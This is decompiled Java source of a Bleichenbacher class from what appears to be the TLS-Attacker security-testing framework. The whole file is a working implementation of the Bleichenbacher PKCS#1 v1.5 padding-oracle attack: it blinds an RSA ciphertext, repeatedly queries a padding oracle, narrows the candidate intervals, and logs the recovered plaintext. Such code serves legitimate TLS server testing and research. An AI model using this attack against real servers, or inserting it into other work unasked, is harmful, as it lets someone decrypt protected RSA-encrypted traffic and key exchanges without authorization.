/*
 * Decompiled with CFR 0.152.
 */
package de.rub.nds.tlsattacker.attacks.pkcs1;

import de.rub.nds.modifiablevariable.util.ArrayConverter;
import de.rub.nds.tlsattacker.attacks.pkcs1.Interval;
import de.rub.nds.tlsattacker.attacks.pkcs1.OracleException;
import de.rub.nds.tlsattacker.attacks.pkcs1.Pkcs1Attack;
import de.rub.nds.tlsattacker.attacks.pkcs1.oracles.Pkcs1Oracle;
import de.rub.nds.tlsattacker.util.MathHelper;
import java.math.BigInteger;
import java.util.ArrayList;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Bleichenbacher
extends Pkcs1Attack {
    private static final Logger LOGGER = LogManager.getLogger();
    protected BigInteger s0;
    protected BigInteger si;
    protected Interval[] m;
    protected final boolean msgIsPKCS;

    public Bleichenbacher(byte[] msg, Pkcs1Oracle pkcsOracle, boolean msgPKCScofnorm) {
        super(msg, pkcsOracle);
        this.msgIsPKCS = msgPKCScofnorm;
        this.c0 = BigInteger.ZERO;
        this.si = BigInteger.ZERO;
        this.m = null;
        int tmp = this.publicKey.getModulus().bitLength();
        tmp = (MathHelper.intceildiv((int)tmp, (int)8) - 2) * 8;
        this.bigB = BigInteger.ONE.shiftLeft(tmp);
    }

    public void attack() throws OracleException {
        int i = 0;
        boolean solutionFound = false;
        LOGGER.info("Step 1: Blinding");
        if (this.msgIsPKCS) {
            LOGGER.info("Step skipped --> Message is considered as PKCS compliant.");
            LOGGER.info("Testing the validity of the original message");
            this.oracle.checkPKCSConformity(this.encryptedMsg);
            this.s0 = BigInteger.ONE;
            this.c0 = new BigInteger(1, this.encryptedMsg);
            this.m = new Interval[]{new Interval(BigInteger.valueOf(2L).multiply(this.bigB), BigInteger.valueOf(3L).multiply(this.bigB).subtract(BigInteger.ONE))};
        } else {
            this.stepOne();
        }
        ++i;
        while (!solutionFound) {
            LOGGER.info("Step 2: Searching for PKCS conforming messages.");
            this.stepTwo(i);
            LOGGER.info("Step 3: Narrowing the set of solutions.");
            this.stepThree(i);
            LOGGER.info("Step 4: Computing the solution.");
            solutionFound = this.stepFour(i);
            ++i;
            LOGGER.info("// Total # of queries so far: {}", (Object)this.oracle.getNumberOfQueries());
        }
    }

    protected void stepOne() throws OracleException {
        byte[] send;
        boolean pkcsConform;
        BigInteger n = this.publicKey.getModulus();
        BigInteger ciphered = new BigInteger(1, this.encryptedMsg);
        do {
            this.si = this.si.add(BigInteger.ONE);
        } while (!(pkcsConform = this.oracle.checkPKCSConformity(send = this.prepareMsg(ciphered, this.si))));
        this.c0 = new BigInteger(1, send);
        this.s0 = this.si;
        this.m = new Interval[]{new Interval(BigInteger.valueOf(2L).multiply(this.bigB), BigInteger.valueOf(3L).multiply(this.bigB).subtract(BigInteger.ONE))};
        LOGGER.debug(" Found s0 : " + this.si);
    }

    protected void stepTwo(int i) throws OracleException {
        if (i == 1) {
            this.stepTwoA();
        } else if (i > 1 && this.m.length >= 2) {
            this.stepTwoB();
        } else if (this.m.length == 1) {
            this.stepTwoC();
        }
        LOGGER.debug(" Found s" + i + ": " + this.si);
    }

    protected void stepTwoA() throws OracleException {
        byte[] send;
        boolean pkcsConform;
        BigInteger n = this.publicKey.getModulus();
        LOGGER.debug("Step 2a: Starting the search");
        BigInteger[] tmp = n.divideAndRemainder(BigInteger.valueOf(3L).multiply(this.bigB));
        this.si = BigInteger.ZERO.compareTo(tmp[1]) != 0 ? tmp[0].add(BigInteger.ONE) : tmp[0];
        this.si = this.si.subtract(BigInteger.ONE);
        do {
            this.si = this.si.add(BigInteger.ONE);
        } while (!(pkcsConform = this.oracle.checkPKCSConformity(send = this.prepareMsg(this.c0, this.si))));
    }

    private void stepTwoB() throws OracleException {
        byte[] send;
        boolean pkcsConform;
        LOGGER.debug("Step 2b: Searching with more than one interval left");
        do {
            this.si = this.si.add(BigInteger.ONE);
        } while (!(pkcsConform = this.oracle.checkPKCSConformity(send = this.prepareMsg(this.c0, this.si))));
    }

    protected void stepTwoC() throws OracleException {
        byte[] send;
        boolean pkcsConform;
        BigInteger n = this.publicKey.getModulus();
        LOGGER.debug("Step 2c: Searching with one interval left");
        BigInteger ri = this.si.multiply(this.m[0].upper);
        ri = ri.subtract(BigInteger.valueOf(2L).multiply(this.bigB));
        ri = ri.multiply(BigInteger.valueOf(2L));
        ri = ri.divide(n);
        BigInteger upperBound = this.step2cComputeUpperBound(ri, n, this.m[0].lower);
        BigInteger lowerBound = this.step2cComputeLowerBound(ri, n, this.m[0].upper);
        this.si = lowerBound.subtract(BigInteger.ONE);
        do {
            this.si = this.si.add(BigInteger.ONE);
            if (this.si.compareTo(upperBound) <= 0) continue;
            ri = ri.add(BigInteger.ONE);
            upperBound = this.step2cComputeUpperBound(ri, n, this.m[0].lower);
            this.si = lowerBound = this.step2cComputeLowerBound(ri, n, this.m[0].upper);
        } while (!(pkcsConform = this.oracle.checkPKCSConformity(send = this.prepareMsg(this.c0, this.si))));
    }

    private void stepThree(int i) {
        BigInteger n = this.publicKey.getModulus();
        ArrayList<Interval> ms = new ArrayList<Interval>();
        for (Interval interval : this.m) {
            BigInteger lowerBound;
            BigInteger upperBound = this.step3ComputeUpperBound(this.si, n, interval.upper);
            BigInteger r = lowerBound = this.step3ComputeLowerBound(this.si, n, interval.lower);
            while (r.compareTo(upperBound) < 1) {
                BigInteger max = BigInteger.valueOf(2L).multiply(this.bigB).add(r.multiply(n));
                BigInteger[] tmp = max.divideAndRemainder(this.si);
                max = BigInteger.ZERO.compareTo(tmp[1]) != 0 ? tmp[0].add(BigInteger.ONE) : tmp[0];
                BigInteger min = BigInteger.valueOf(3L).multiply(this.bigB);
                min = min.subtract(BigInteger.ONE);
                min = min.add(r.multiply(n));
                min = min.divide(this.si);
                if (interval.lower.compareTo(max) > 0) {
                    max = interval.lower;
                }
                if (interval.upper.compareTo(min) < 0) {
                    min = interval.upper;
                }
                if (max.compareTo(min) <= 0) {
                    ms.add(new Interval(max, min));
                }
                r = r.add(BigInteger.ONE);
            }
        }
        LOGGER.debug(" # of intervals for M" + i + ": " + ms.size());
        this.m = ms.toArray(new Interval[ms.size()]);
    }

    private boolean stepFour(int i) {
        boolean result = false;
        if (this.m.length == 1 && this.m[0].lower.compareTo(this.m[0].upper) == 0) {
            this.solution = this.s0.modInverse(this.publicKey.getModulus());
            this.solution = this.solution.multiply(this.m[0].upper).mod(this.publicKey.getModulus());
            LOGGER.info("====> Solution found!\n {}", (Object)ArrayConverter.bytesToHexString((byte[])this.solution.toByteArray()));
            result = true;
        }
        return result;
    }

    private BigInteger step3ComputeUpperBound(BigInteger s, BigInteger modulus, BigInteger upperIntervalBound) {
        BigInteger upperBound = upperIntervalBound.multiply(s);
        BigInteger[] tmp = (upperBound = upperBound.subtract(BigInteger.valueOf(2L).multiply(this.bigB))).divideAndRemainder(modulus);
        upperBound = BigInteger.ZERO.compareTo(tmp[1]) != 0 ? BigInteger.ONE.add(tmp[0]) : tmp[0];
        return upperBound;
    }

    private BigInteger step3ComputeLowerBound(BigInteger s, BigInteger modulus, BigInteger lowerIntervalBound) {
        BigInteger lowerBound = lowerIntervalBound.multiply(s);
        lowerBound = lowerBound.subtract(BigInteger.valueOf(3L).multiply(this.bigB));
        lowerBound = lowerBound.add(BigInteger.ONE);
        lowerBound = lowerBound.divide(modulus);
        return lowerBound;
    }

    protected BigInteger step2cComputeLowerBound(BigInteger r, BigInteger modulus, BigInteger upperIntervalBound) {
        BigInteger lowerBound = BigInteger.valueOf(2L).multiply(this.bigB);
        lowerBound = lowerBound.add(r.multiply(modulus));
        lowerBound = lowerBound.divide(upperIntervalBound);
        return lowerBound;
    }

    protected BigInteger step2cComputeUpperBound(BigInteger r, BigInteger modulus, BigInteger lowerIntervalBound) {
        BigInteger upperBound = BigInteger.valueOf(3L).multiply(this.bigB);
        upperBound = upperBound.add(r.multiply(modulus));
        upperBound = upperBound.divide(lowerIntervalBound);
        return upperBound;
    }
}

